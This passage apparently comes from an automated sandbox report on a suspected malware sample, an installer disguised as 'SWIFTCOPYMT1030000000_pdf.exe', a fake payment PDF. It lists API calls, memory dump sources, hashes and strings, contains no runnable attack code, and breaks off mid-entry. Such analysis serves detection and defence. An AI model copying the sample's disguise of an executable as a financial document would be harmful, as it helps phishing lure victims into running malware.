                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BEB
                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C0B
                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00404C20
                                      • GlobalFree.KERNEL32(00000000), ref: 00404C30
                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CA9
                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404D52
                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D61
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D81
                                      • ShowWindow.USER32(?,00000000), ref: 00404DCF
                                      • GetDlgItem.USER32(?,000003FE), ref: 00404DDA
                                      • ShowWindow.USER32(00000000), ref: 00404DE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N
                                      • API String ID: 1638840714-813528018
                                      • Opcode ID: 5c97457c4d1d97535a494aa813db42837bbe9887a2ccc9027b3f96986e3e390d
                                      • Instruction ID: 73e5042133b470fdde48d750d06e43d2904589ccee469aaf4ee40575ec54014f
                                      • Opcode Fuzzy Hash: 5c97457c4d1d97535a494aa813db42837bbe9887a2ccc9027b3f96986e3e390d
                                      • Instruction Fuzzy Hash: 59027FB0900209AFEB10DF54DC85AAE7BB5FB84315F10853AF610B62E1C7799E42CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDlgItem.USER32(?,000003FB), ref: 00404314
                                      • SetWindowTextA.USER32(00000000,?), ref: 0040433E
                                      • SHBrowseForFolderA.SHELL32(?,0079E0D0,?), ref: 004043EF
                                      • CoTaskMemFree.OLE32(00000000), ref: 004043FA
                                      • lstrcmpiA.KERNEL32(Call,Epicurize Setup: Installing), ref: 0040442C
                                      • lstrcatA.KERNEL32(?,Call), ref: 00404438
                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040444A
                                        • Part of subcall function 0040538C: GetDlgItemTextA.USER32(?,?,00000400,00404481), ref: 0040539F
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E3A
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E4C
                                        • Part of subcall function 00405DE2: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E5C
                                      • GetDiskFreeSpaceA.KERNEL32(0079DCC8,?,?,0000040F,?,0079DCC8,0079DCC8,?,00000000,0079DCC8,?,?,000003FB,?), ref: 00404505
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404520
                                      • SetDlgItemTextA.USER32(00000000,00000400,0079DCB8), ref: 004045A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                      • String ID: A$C:\Users\user\udskriftskartotek\chiromancy\refalling$Call$Epicurize Setup: Installing
                                      • API String ID: 2246997448-2569746891
                                      • Opcode ID: f4b395fbc956a3f401c18fbd49a21f44177e585b157c0ae4a54349ed1422c75f
                                      • Instruction ID: 03cdc0df629eda19bc81850558ffdd0616f3ff49271ebeceec1b5cb03d6b2ac4
                                      • Opcode Fuzzy Hash: f4b395fbc956a3f401c18fbd49a21f44177e585b157c0ae4a54349ed1422c75f
                                      • Instruction Fuzzy Hash: DB9192B1900208BBDB11AFA1CC81AAF77B8EF85305F14447BFB01B62D1D77C9A418B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040265E
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID:
                                      • API String ID: 1974802433-0
                                      • Opcode ID: 23c103152627ce6bba449e45accf03574f1600b64c0886b4bf333a450fa6d8b6
                                      • Instruction ID: 3ab4b2e523f4ece34398282fff8650a64823828ee778d7c177d23f294cc8494d
                                      • Opcode Fuzzy Hash: 23c103152627ce6bba449e45accf03574f1600b64c0886b4bf333a450fa6d8b6
                                      • Instruction Fuzzy Hash: FAF0A032A041149AD700E7B4A949AEEB778CB15324F20067BE101E20C2C6B869859A2E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040405B
                                      • GetDlgItem.USER32(00000000,000003E8), ref: 0040406F
                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040408D
                                      • GetSysColor.USER32(?), ref: 0040409E
                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040AD
                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040BC
                                      • lstrlenA.KERNEL32(?), ref: 004040BF
                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CE
                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040E3
                                      • GetDlgItem.USER32(?,0000040A), ref: 00404145
                                      • SendMessageA.USER32(00000000), ref: 00404148
                                      • GetDlgItem.USER32(?,000003E8), ref: 00404173
                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041B3
                                      • LoadCursorA.USER32(00000000,00007F02), ref: 004041C2
                                      • SetCursor.USER32(00000000), ref: 004041CB
                                      • ShellExecuteA.SHELL32(0000070B,open,007A16A0,00000000,00000000,00000001), ref: 004041DE
                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004041EB
                                      • SetCursor.USER32(00000000), ref: 004041EE
                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040421A
                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                      • String ID: Call$N$open
                                      • API String ID: 3615053054-2563687911
                                      • Opcode ID: d629206fc8082d4d9534340c1f089e738487a858c59a90b8640b314579ac6490
                                      • Instruction ID: 031dbeac94855a04ab7bc056baf49b9f62a127ba2e136bb98bc4968a945489ce
                                      • Opcode Fuzzy Hash: d629206fc8082d4d9534340c1f089e738487a858c59a90b8640b314579ac6490
                                      • Instruction Fuzzy Hash: DF61B971A40209BFEB109F60CC45F6A3B69FB84755F10816AFB047B2D1C7B8A951CF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrcpyA.KERNEL32(007A0A88,NUL,?,00000000,?,00000000,?,00405A53,?,?,00000001,00405613,?,00000000,000000F1,?), ref: 004058AD
                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A53,?,?,00000001,00405613,?,00000000,000000F1,?), ref: 004058D1
                                      • GetShortPathNameA.KERNEL32(00000000,007A0A88,00000400), ref: 004058DA
                                        • Part of subcall function 0040578A: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,0040599C,00000000,[Rename]), ref: 0040579A
                                        • Part of subcall function 0040578A: lstrlenA.KERNEL32(?,?,00000000,0040599C,00000000,[Rename]), ref: 004057CC
                                      • GetShortPathNameA.KERNEL32(?,007A0E88,00000400), ref: 004058F7
                                      • wsprintfA.USER32 ref: 00405915
                                      • GetFileSize.KERNEL32(00000000,00000000,007A0E88,C0000000,00000004,007A0E88,?,?,?,?,?), ref: 00405950
                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040595F
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405979
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004059A9
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,007A0688,00000000,-0000000A,0040936C,00000000,[Rename]), ref: 004059FF
                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405A11
                                      • GlobalFree.KERNEL32(00000000), ref: 00405A18
                                      • CloseHandle.KERNEL32(00000000), ref: 00405A1F
                                        • Part of subcall function 00405825: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,80000000,00000003), ref: 00405829
                                        • Part of subcall function 00405825: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                      • String ID: %s=%s$NUL$[Rename]
                                      • API String ID: 3756836283-4148678300
                                      • Opcode ID: 624728a16f041d5ab8a4dfe5a1be018cc08b908fa827cbe652aff8f36f69eba2
                                      • Instruction ID: 703081f9f45e0959c07b6a00457515c8324f77790511a56e8ac0345a7c84fdf8
                                      • Opcode Fuzzy Hash: 624728a16f041d5ab8a4dfe5a1be018cc08b908fa827cbe652aff8f36f69eba2
                                      • Instruction Fuzzy Hash: 91412B71B04705AFD2206B249C49F6B7B6CEF89754F14053AFD01F62D2D678A8008EBD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                      • DrawTextA.USER32(00000000,007A1F00,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: 98e14e1640eb646ee3811aa623ba2e5d1e9cc6367b1deba79bcf05c34458357a
                                      • Instruction ID: dd0e79dd03d73333c37d03741989dce367d08c72bd534bd23d7a1991bc4c48e1
                                      • Opcode Fuzzy Hash: 98e14e1640eb646ee3811aa623ba2e5d1e9cc6367b1deba79bcf05c34458357a
                                      • Instruction Fuzzy Hash: E5419A71804249AFCB058F95CD459BFBFB9FF45310F00812AF962AA1A0C738EA51DFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • wsprintfA.USER32 ref: 100023D2
                                      • GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023EA
                                      • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023FB
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002410
                                      • GlobalFree.KERNEL32(00000000), ref: 10002417
                                        • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
                                      • GlobalFree.KERNEL32(?), ref: 1000248E
                                      • GlobalFree.KERNEL32(00000000), ref: 100024B7
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134294229538.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000006.00000002.134294192586.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000006.00000002.134294264369.0000000010003000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000006.00000002.134294303301.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_10000000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2278267121-0
                                      • Opcode ID: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
                                      • Instruction ID: 2b73d6ec50a8d2f500b210c633f34be0aa2160400c3477ecc395e3c682f4b703
                                      • Opcode Fuzzy Hash: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
                                      • Instruction Fuzzy Hash: DE41ADB1109216EFF715DFA4CC88E2BBBECFB042D57124619FA51921A9DB35AC409B31
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E3A
                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E4C
                                      • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E5C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 589700163-3202841998
                                      • Opcode ID: 2024885374f02dac88d9fb103eccae40028a2ab1d30660e2dcec4d8ea4488381
                                      • Instruction ID: 982ed4f0ea0d1ffb3a75412ce8e95c0ea6245537b44222f6b90d7ae264b7a878
                                      • Opcode Fuzzy Hash: 2024885374f02dac88d9fb103eccae40028a2ab1d30660e2dcec4d8ea4488381
                                      • Instruction Fuzzy Hash: 7511B671804B9129EB3217248C44B776F98CB9A7A0F18047BE5C5723C2C67C5E828EED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowLongA.USER32(?,000000EB), ref: 00403F0B
                                      • GetSysColor.USER32(00000000), ref: 00403F27
                                      • SetTextColor.GDI32(?,00000000), ref: 00403F33
                                      • SetBkMode.GDI32(?,?), ref: 00403F3F
                                      • GetSysColor.USER32(?), ref: 00403F52
                                      • SetBkColor.GDI32(?,?), ref: 00403F62
                                      • DeleteObject.GDI32(?), ref: 00403F7C
                                      • CreateBrushIndirect.GDI32(?), ref: 00403F86
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                      • Instruction ID: 43f1f9eadd2e023582460ec461a07703dc87d5103ca70cdaf59bc9c3c4c10c95
                                      • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                      • Instruction Fuzzy Hash: B1219971904705AFC7219F68DD08B5BBFF8AF01715F04852AF995E22D1C378E944CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(?), ref: 10002264
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000228E
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022A3
                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022B2
                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 100022BF
                                      • GlobalFree.KERNEL32(00000000), ref: 100022C6
                                      • GlobalFree.KERNEL32(00000000), ref: 100022FD
                                        • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134294229538.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000006.00000002.134294192586.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000006.00000002.134294264369.0000000010003000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000006.00000002.134294303301.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_10000000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
                                      • String ID:
                                      • API String ID: 3955009414-0
                                      • Opcode ID: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                      • Instruction ID: a605aeec0f08bdd00b0ee3428b37a4786007c3c680f5ed26bc2609ce7b065058
                                      • Opcode Fuzzy Hash: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                      • Instruction Fuzzy Hash: 5741AD70504306EFF364DFA48984B6BB7F8FB453E1F21492AF956C619ADB30A840DB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026E1
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026FD
                                      • GlobalFree.KERNEL32(?), ref: 00402736
                                      • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402748
                                      • GlobalFree.KERNEL32(00000000), ref: 0040274F
                                      • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402767
                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040277B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
